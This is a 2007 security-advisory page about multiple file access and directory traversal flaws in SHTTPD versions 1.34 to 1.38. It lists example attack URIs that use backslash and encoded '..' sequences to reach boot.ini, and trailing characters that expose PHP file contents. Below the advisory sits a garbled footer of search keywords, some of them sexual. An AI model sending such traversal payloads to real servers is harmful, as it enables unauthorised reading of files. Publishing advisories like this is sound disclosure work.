about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , SHTTPD Multiple File Access And Directory Traversal Vulnerabilities


Title SHTTPD Multiple File Access And Directory Traversal Vulnerabilities
Published 2007-12-07-12:00AM
Updated 2007-12-10-03:22PM
Class Access Validation Error
CVE  
Remote  Yes
Local  No
Credit  Luigi Auriemma is credited with the discovery of these vulnerabilities. Shay priel is credited with discovering the %20 character issue.
Vulnerable  SHTTPD SHTTPD 1.38
SHTTPD SHTTPD 1.35
SHTTPD SHTTPD 1.34
Not Vulnerable  
Code  Attackers can exploit these issues via a browser.The following example URIs are available:http://www.example.com/..\..\..\boot.ini
http://www.example.com/..\%2e%2e%5c..\boot.ini
http://www.example.com/file.php+
http://www.example.com/file.php.
http://www.example.com/file.php%80
http://www.example.com/file.php%ff
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 02:32:59 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
pocketpc news for c Sex.vedeo 200 /compo Sex wall xxnude Apache mod news for c 200 /compo news for c 2...2bbac5 news searc ensim 2...2bbac5 Kada t35t Boysex Www.privat animal gir so re yuan Sex.free news for c pd+shop Sexgals.Co fat gril news for c ip board 2 lahor.sex MxBB Porta www.cp101. sdbot05b-a Indianxxxm httpd 1.3. www.bh88.n Sun Solari windows sp 200 /compo Microsoft 0day Www.Sexy news for c PROFITCODE 2.4.28-grs bollywood Ww+xxl www.tjpeix c...dosi.t www.zhuoqi maxcpm.inf mambo+Remo